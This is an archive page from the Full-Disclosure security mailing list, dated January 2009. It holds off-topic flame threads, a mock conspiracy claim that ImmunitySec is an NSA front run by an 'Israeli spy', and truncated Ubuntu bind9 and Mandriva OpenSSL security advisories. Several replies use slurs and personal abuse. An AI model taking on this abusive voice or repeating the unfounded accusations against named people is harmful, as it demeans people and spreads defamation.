We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ImmunitySec is an NSA front.
are'nt NSA and Mossad supposed to be enemies ? i mean what about all the crap about Israilies hacking into NSA's unpatched Exchange Server 2003 and put messages there that resulted in U.S invading Iraq ? and while you are at it since Dave is in favor of Python should we just abandon Canvas and go back to Metasploit ? and having that in mind does anybody know if Obama prefers Python or Ruby ? well , before full-disclosure turns into clown-disclosure thought i deserve to send a message after all these years being a silent contributor . On Fri, Jan 9, 2009 at 2:35 AM, James Matthews nytrok...@gmail.com wrote: Well it's now an Israeli Plot. On Thu, Jan 8, 2009 at 9:52 PM, ChromeSilver chromesil...@exec-labs.comwrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear Prof. Chatner, I don't know what you mean, on GoogleEarth it's 3D-Building. Cheers, ChromeSilver If light be the brightest light... Wherfore then doth it shadows cast? - -R.Rohonyi Professor Micheal Chatner schrieb: I have recently witnessed a conspiracy by ImmunitySEC headed by the Israeli spy David Aitel. http://maps.google.com/maps?q=IMMUNITYSEC,+miami,+floe=utf-8client=firefox-aie=UTF8ll=25.783508,-80.140972spn=0,359.818039z=13iwloc=Alayer=ccbll=25.783635,-80.140995panoid=RuVREzzTYFjcmaegYtzhRgcbp=12,441.86166752012093,,0,5 As you can see their entire road is BLURRED OUT. This is obviously a tactic to keep out the Chinese spies that they time and time again sell 0day to. It is too complicated to explain now but I will have more research later. Professor Micheal Chatner, M.D. CISSP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQIVAwUBSWZZi4VSCfUHd8OQAQK7ew/8C3V94vIJQvK9CtxWvYIe+707a4NNDzRV JH2dgMrgKZFUAWkbbGiOmBUiW5Mz4b8oQN0eCvYxD/hQoDTtRAEuG6u9x9lwmcsb +sRf9qpzOp5AQdEe2neZMQGp78E8hj1iXuTKlazAibrpal+PIKDoB7QGQgiLdsEm EPDfnhWoTg+NavaJyUOvW0zHmEq5zAx1jMs2uv8MENm4eciJcLo3MQCk3+d2M0s2 roX23ipRuemAPzVPMUwVYDrxfd/AbRxShhSzvejm969hFvYXzyHrSy1EZ9cOFY/e 1UNhsYaFEKE3ZucL8zCiE/p9OzG77dZdSVz6qNCeTZCespgvCU8Qzuqcz/onqBoZ Mc+9vTXTHbA0EcustCYLIvkFLrP8vND/wx3YR/+V5GaxAzZCvEqJ+0txz9dWJO14 TwSnPtOoPL/NXyj6he5Dz4UVd1s/FTS5mHSReZR1bVKaiBSUxLivvW39M5WkdMG7 dscwI4rXN+xg/AL4x8zKvTpfq1WmKe9IZW102Wg6qSn1kBYALY7Je+BSQNrDS6nE 8ITUO+sEFyoATXYkJ+NfR1D8/uE9hScwspdDwZo0W5mqwaFjK4/tuTKl6UodnGlA t6oKgPcxvfsBlCg+Uljv8yIuvlFmTWxblTPxBynQOwLgCWwPyeA464MhTluZqx1h zfhXS88jYuI= =i0Z9 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
y? its working. u r proving every day how much of an idiot u r. like, for instance posting about ur OWN FUCKING TWITTER post! lol. its not a tactic. i really do h8 u. im not in it 4 every1 else. just sitting here h8ing u is enuf. and which big boys m i playing with? u? LOLOLOLOLLOLOLOLOLOLOLOLOLOLOLOLOOLOL sigh. LOLOLOLOLOLOLOLOLOLOROFLROFLROFLROFLROFLROFLROFL thatll be the day dickwad. gobbles has released. what have u released besides a too-long tirade of nonsense that no 1 cares about? On Thu, Jan 8, 2009 at 11:45 AM, n3td3v xploita...@gmail.com wrote: It's some kind of peer pressure tactic he's been trying, its pretty lame though and just ruins the list by arguing with me. I'm not like Gobbles who released a vulnerability out of peer preassure that was pretty lame :) You're messing with the big boys Ureleet, so maybe after a whole year trying your tactic, you kill off your nickname now and try something different on a different name? On Thu, Jan 8, 2009 at 3:40 PM, Steve Clement st...@localhost.lu wrote: Can please eveyone reply to this thread so I know who hates who (it's for my Social profile of this list) But more importantly so I know (or rather all know) who to filter out because they lack the respect to take their wars offline (cmon' nuke each other already it's easy and I know people that know people to provide the pure stuff) anyways kids, Cheers. Steve Clement ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
i h8 u both. On Thu, Jan 8, 2009 at 10:40 AM, Steve Clement st...@localhost.lu wrote: Can please eveyone reply to this thread so I know who hates who (it's for my Social profile of this list) But more importantly so I know (or rather all know) who to filter out because they lack the respect to take their wars offline (cmon' nuke each other already it's easy and I know people that know people to provide the pure stuff) anyways kids, Cheers. Steve Clement On Jan 8, 2009, at 4:17 PM, n3td3v wrote: Yes you are pretty dumb. On Thu, Jan 8, 2009 at 3:06 PM, Ureleet urel...@gmail.com wrote: o i c. were dumb and ur smart.. On Thu, Jan 8, 2009 at 7:12 AM, n3td3v xploita...@gmail.com wrote: On Wed, Jan 7, 2009 at 3:22 PM, Jan G.B. ro0ot.w...@googlemail.com wrote: I don't think that your post is on topic of this list. And I don't think anyone is following you - guess that's the reason why you're *here*, again. Also, an intellectual reply to your posting would be quite absurd. I see cyber war being used incorrectly a national security issue. You may not realise that it might be, but I see it as being one. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
pot kettle black u cunt On Thu, Jan 8, 2009 at 10:17 AM, n3td3v xploita...@gmail.com wrote: Yes you are pretty dumb. On Thu, Jan 8, 2009 at 3:06 PM, Ureleet urel...@gmail.com wrote: o i c. were dumb and ur smart.. On Thu, Jan 8, 2009 at 7:12 AM, n3td3v xploita...@gmail.com wrote: On Wed, Jan 7, 2009 at 3:22 PM, Jan G.B. ro0ot.w...@googlemail.com wrote: I don't think that your post is on topic of this list. And I don't think anyone is following you - guess that's the reason why you're *here*, again. Also, an intellectual reply to your posting would be quite absurd. I see cyber war being used incorrectly a national security issue. You may not realise that it might be, but I see it as being one. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
dont smile at me faggot. On Thu, Jan 8, 2009 at 10:13 AM, n3td3v xploita...@gmail.com wrote: Never :) On Thu, Jan 8, 2009 at 3:06 PM, Ureleet urel...@gmail.com wrote: so leave? On Thu, Jan 8, 2009 at 9:23 AM, n3td3v xploita...@gmail.com wrote: This is the average user response from full-disclosure, no capacity to have a serious conversation. On Thu, Jan 8, 2009 at 2:15 PM, vulcanius vulcan...@gmail.com wrote: Yeah but you also see the world in some fucked up, retarded, distorted, and psychedelic way while the rest of us see it normally. On Thu, Jan 8, 2009 at 7:12 AM, n3td3v xploita...@gmail.com wrote: I see cyber war being used incorrectly a national security issue. You may not realise that it might be, but I see it as being one. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
n3td3v fits into this profile perfectly. no one takes n3td3v seriously.. not even n3td3v. I guess you have to give credit where its due... n3td3v is the master troll... and even though I know hes a troll, he still gets me! btw, that wasnt a compliment. fuck you and die. On Fri, Jan 9, 2009 at :23 AM, n3td3v xploita...@gmail.com wrote: This is the average user response from full-disclosure, no capacity to have a serious conversation. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
LOL. Do you now feel like a big man for calling people kids and alluding to the fact you know people? Feel like an internet scholar because you use the phrase nuke? You bitch that people dont take their wars offline, but you contribute to the noise list with this post.. so what is your beef, tough guy? Next time you might try shutting the fuck up rather than show off how inept you are at doing menial tasks without help.. like deciding who to filter. On Fri, Jan 9, 2009 at :40 AM, Steve Clement st...@localhost.lu wrote: Can please eveyone reply to this thread so I know who hates who (it's for my Social profile of this list) But more importantly so I know (or rather all know) who to filter out because they lack the respect to take their wars offline (cmon' nuke each other already it's easy and I know people that know people to provide the pure stuff) anyways kids, Cheers. Steve Clement ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-706-1] Bind vulnerability
=== Ubuntu Security Notice USN-706-1 January 09, 2009 bind9 vulnerability CVE-2009-0025 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.10 Ubuntu 8.04 LTS Ubuntu 8.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libdns211:9.3.2-2ubuntu1.6 Ubuntu 7.10: libdns321:9.4.1-P1-3ubuntu2.1 Ubuntu 8.04 LTS: libdns351:9.4.2.dfsg.P2-2ubuntu0.1 Ubuntu 8.10: libdns431:9.5.0.dfsg.P2-1ubuntu3.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: It was discovered that Bind did not properly perform certificate verification. When DNSSEC with DSA certificates are in use, a remote attacker could exploit this to bypass certificate validation to spoof DNS entries and poison DNS caches. Among other things, this could lead to misdirected email and web traffic. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2-2ubuntu1.6.diff.gz Size/MD5: 105531 995d2d32dc536b1f1588e0045136d721 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2-2ubuntu1.6.dsc Size/MD5: 773 9a95c6923ba106b13ea215b38779f370 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2.orig.tar.gz Size/MD5: 5302112 55e709501a7780233c36e25ccd15ece2 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-doc_9.3.2-2ubuntu1.6_all.deb Size/MD5: 180884 49c34a9d28b1224c821c0a5bce3a0e36 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.2-2ubuntu1.6_amd64.deb Size/MD5: 112190 ae997c07b41237003f4c423253f1f426 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2-2ubuntu1.6_amd64.deb Size/MD5: 311696 8bfff8812ec9e7867b1b2ab80d44a86b http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.2-2ubuntu1.6_amd64.deb Size/MD5: 185022 b870965df596d4ca019ebdeb0782c892 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.2-2ubuntu1.6_amd64.deb Size/MD5: 1130226 2902f9d2ff4a95ede317ca18b32e6296 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.2-2ubuntu1.6_amd64.deb Size/MD5:92266 083a7b72fd1f55ce61c97f435dd57934 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns21_9.3.2-2ubuntu1.6_amd64.deb Size/MD5: 557428 a2a48eada6c6a5b4499cddfd9a66e841 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc11_9.3.2-2ubuntu1.6_amd64.deb Size/MD5: 190708 17a0b44a527ef02cc4a67e06261e8656 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.2-2ubuntu1.6_amd64.deb Size/MD5:93392 4fa6e6d08766904ede6395a5ff2f0434 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.2-2ubuntu1.6_amd64.deb Size/MD5: 109210 1569703c099b0b9f1bca42832218bc10 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres9_9.3.2-2ubuntu1.6_amd64.deb Size/MD5: 111662 92818aee70aa8993a75df11bdcbacb62 http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.3.2-2ubuntu1.6_amd64.deb Size/MD5: 220104 25e3b49f861b3cb9291dd68ee74614fb i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.2-2ubuntu1.6_i386.deb Size/MD5: 109048 6d4033c5d66cd1e6beb55373238d613f http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2-2ubuntu1.6_i386.deb Size/MD5: 290004 f550b9df7e2a1f56466f6836d9f04f72 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.2-2ubuntu1.6_i386.deb Size/MD5: 175698 68cbf10bb443e7a28752fe78646b2ec5 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.2-2ubuntu1.6_i386.deb Size/MD5: 997228 7e457fac8b3e3939e0032af64755ddf7 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.2-2ubuntu1.6_i386.deb Size/MD5:91478 afbb74eff710a5123890abc4442260a9 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns21_9.3.2-2ubuntu1.6_i386.deb Size/MD5: 483080 38e35b2b6baaf03c26e5051aeffa0c9c http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc11_9.3.2-2ubuntu1.6_i386.deb Size/MD5: 172718 36369d72a18d62845c91a87d87db0417 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.2-2ubuntu1.6_i386.deb Size/MD5:90930 9710baa7d93e622cec8ddffa46ce269b http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.2-2ubuntu1.6_i386.deb Size/MD5:
Re: [Full-disclosure] The war in Palestine
THIS IS A COMPUTER SECURITY MAILING LIST. no one cares about your opinion on this horseshit... atleast n3td3v stays vaguely on topic (no matter how skewed his thoughts may be) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
Two or three web application bugs for Google Groups to secure it to cover my own back, i'm not the kind of guy who releases bugs from random software for no reason to look cool. I secured my Google Group, I have no reason else to secure anything else. If a new bug for Google Groups comes up, one day there maybe another release from me. There are too many folks out there securing things for random reasons just to look cool :) Have a real reason to release bugs, have a good story behind your releases like I do. Even me starting to use Twitter has a big story behind it because someone started the account to make fun of me, I emailed Twitter they gave me the account, I post it to full-disclosure just to rub it in the previous owners face. On Thu, Jan 8, 2009 at 11:49 PM, Ureleet urel...@gmail.com wrote: gobbles has released. what have u released ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:001 ] openssl
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:001 http://www.mandriva.com/security/ ___ Package : openssl Date: January 8, 2009 Affected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0 ___ Problem Description: A vulnerability was found by the Google Security Team with how OpenSSL checked the verification of certificates. An attacker in control of a malicious server or able to effect a man-in-the-middle attack, could present a malformed SSL/TLS signature from a certificate chain to a vulnerable client, which would then bypass the certificate validation (CVE-2008-5077). The updated packages have been patched to prevent this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5077 ___ Updated Packages: Mandriva Linux 2008.0: 6585e08eab279e6a249630385683bf43 2008.0/i586/libopenssl0.9.8-0.9.8e-8.2mdv2008.0.i586.rpm b5955c2c0a2cc24abd9f5f3ebc7d0148 2008.0/i586/libopenssl0.9.8-devel-0.9.8e-8.2mdv2008.0.i586.rpm 7c92323d7aa583b936ef908f3f6ac867 2008.0/i586/libopenssl0.9.8-static-devel-0.9.8e-8.2mdv2008.0.i586.rpm 2b791168311c3ecba4f8b7acd24e64ab 2008.0/i586/openssl-0.9.8e-8.2mdv2008.0.i586.rpm cf51c48e4c05ac5357f6076fbaeff0a5 2008.0/SRPMS/openssl-0.9.8e-8.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 6259ac0067eee59f888bc516bc3a 2008.0/x86_64/lib64openssl0.9.8-0.9.8e-8.2mdv2008.0.x86_64.rpm fe745327c1bbb599e025a5b90bb05817 2008.0/x86_64/lib64openssl0.9.8-devel-0.9.8e-8.2mdv2008.0.x86_64.rpm bdb7113b06aab0c4d77cbf86bcf208c2 2008.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8e-8.2mdv2008.0.x86_64.rpm d4fda198a80b88c7caaf947af0866df8 2008.0/x86_64/openssl-0.9.8e-8.2mdv2008.0.x86_64.rpm cf51c48e4c05ac5357f6076fbaeff0a5 2008.0/SRPMS/openssl-0.9.8e-8.2mdv2008.0.src.rpm Mandriva Linux 2008.1: 4a0be98cd3fb82a22e3836c5ae81ed37 2008.1/i586/libopenssl0.9.8-0.9.8g-4.2mdv2008.1.i586.rpm 277058ecc1d26d24bf4da5ea27d4a31f 2008.1/i586/libopenssl0.9.8-devel-0.9.8g-4.2mdv2008.1.i586.rpm 29b08a5a233f1987c4ca98aaa4e97ac5 2008.1/i586/libopenssl0.9.8-static-devel-0.9.8g-4.2mdv2008.1.i586.rpm e47be879abc0c089a8f380469a6a62c8 2008.1/i586/openssl-0.9.8g-4.2mdv2008.1.i586.rpm 7395d0e10c1938be16261baba05da55c 2008.1/SRPMS/openssl-0.9.8g-4.2mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 71a69804b928a9f7856f65fee332c5ab 2008.1/x86_64/lib64openssl0.9.8-0.9.8g-4.2mdv2008.1.x86_64.rpm e9c5d1d4895a5a679945bde62df6f988 2008.1/x86_64/lib64openssl0.9.8-devel-0.9.8g-4.2mdv2008.1.x86_64.rpm 7f2d66839f93e2083dcd1b1f27ca4ddf 2008.1/x86_64/lib64openssl0.9.8-static-devel-0.9.8g-4.2mdv2008.1.x86_64.rpm 40408ffdf13faa6c79b28c764bb88b22 2008.1/x86_64/openssl-0.9.8g-4.2mdv2008.1.x86_64.rpm 7395d0e10c1938be16261baba05da55c 2008.1/SRPMS/openssl-0.9.8g-4.2mdv2008.1.src.rpm Mandriva Linux 2009.0: 2512f6a41e9a8e7bcff53e5737029689 2009.0/i586/libopenssl0.9.8-0.9.8h-3.1mdv2009.0.i586.rpm d7774faaed2866da5bb05cbcf07604da 2009.0/i586/libopenssl0.9.8-devel-0.9.8h-3.1mdv2009.0.i586.rpm ed99160bdf1ce33fa81dc47c71915318 2009.0/i586/libopenssl0.9.8-static-devel-0.9.8h-3.1mdv2009.0.i586.rpm 6116fafed014596ee1e6ec43db93133f 2009.0/i586/openssl-0.9.8h-3.1mdv2009.0.i586.rpm 8ad6b0d8aff3bb992d716668450aef3a 2009.0/SRPMS/openssl-0.9.8h-3.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: d2cc04fc0bdaeea8e4cc5d7ab4e997fd 2009.0/x86_64/lib64openssl0.9.8-0.9.8h-3.1mdv2009.0.x86_64.rpm b537da3113c75f87c4fa8d66be2d6797 2009.0/x86_64/lib64openssl0.9.8-devel-0.9.8h-3.1mdv2009.0.x86_64.rpm ef9add2bec302b324b9c0690cf79b57c 2009.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8h-3.1mdv2009.0.x86_64.rpm 16b8c11f4d6dedf2e4176bfc55607c15 2009.0/x86_64/openssl-0.9.8h-3.1mdv2009.0.x86_64.rpm 8ad6b0d8aff3bb992d716668450aef3a 2009.0/SRPMS/openssl-0.9.8h-3.1mdv2009.0.src.rpm Corporate 3.0: 5e8f4b7c1e646d0e16af2d83238a011b corporate/3.0/i586/libopenssl0.9.7-0.9.7c-3.9.C30mdk.i586.rpm 5115d911b9a6842fd0c3495429c7c2f2 corporate/3.0/i586/libopenssl0.9.7-devel-0.9.7c-3.9.C30mdk.i586.rpm b934b4f9686deef6cb1eba750ab36288 corporate/3.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.9.C30mdk.i586.rpm 11ec8a4df261d4d4fa9957d33be08604 corporate/3.0/i586/openssl-0.9.7c-3.9.C30mdk.i586.rpm dcd1a4feb1a04302c54465dce7c7c506 corporate/3.0/SRPMS/openssl-0.9.7c-3.9.C30mdk.src.rpm Corporate 3.0/X86_64: 64521521330df90b42c9c37cafe50b54 corporate/3.0/x86_64/lib64openssl0.9.7-0.9.7c-3.9.C30mdk.x86_64.rpm 3a85c30c0511e42ec76c80e08efe5192
[Full-disclosure] The war in Palestine Pointless noise.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Paul.. * Paul Schmehl [pschmehl_li...@tx.rr.com] said.. [too much] We expect noise from n3td3v, and despite his ph33rsome skills he is no match for a well written procmail rule. I am surprised however that you seem unable to give it a rest on this topic that is so clearly off-topic. While I do have opinions on this episode, i am not so vain as to think the readers on this list care about it and not so arrogant as to keep the topic going despite pleas to get off-topic threads killed. I'm not sure about others on the list, but i thought more of you (and thought more of your respect for other list members). \emm_aich -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAklm99kACgkQZtiOfLMN7yzIFAQAnLdHT5A15vEs0rsr9r/iGkoBdOKY fcJbmdCtT3miZ7dToDZiq9Zvdf8jDZ2kwUewkoalicbNzKCQURNagshaAk3MwZz74Y5b Is8PF6B0tte+RZuEYD5rCJSrMsXzMoFRgmHol8oOI7LoKweFJJic9QP109uqZwWpYVba pR6FQTE= =674i -END PGP SIGNATURE- -- Click here to become certified in medical billing and training at these schools. http://tagline.hushmail.com/fc/PnY6qxvD4GJRVvdf13AbSpVirP8s2hJr4JEC1yxzMVFANfArLLMRS/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Do you use nepenthes?
I looking for someone who use nepenthes in linux. Because I have question about nepenthes in gentoo linux. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
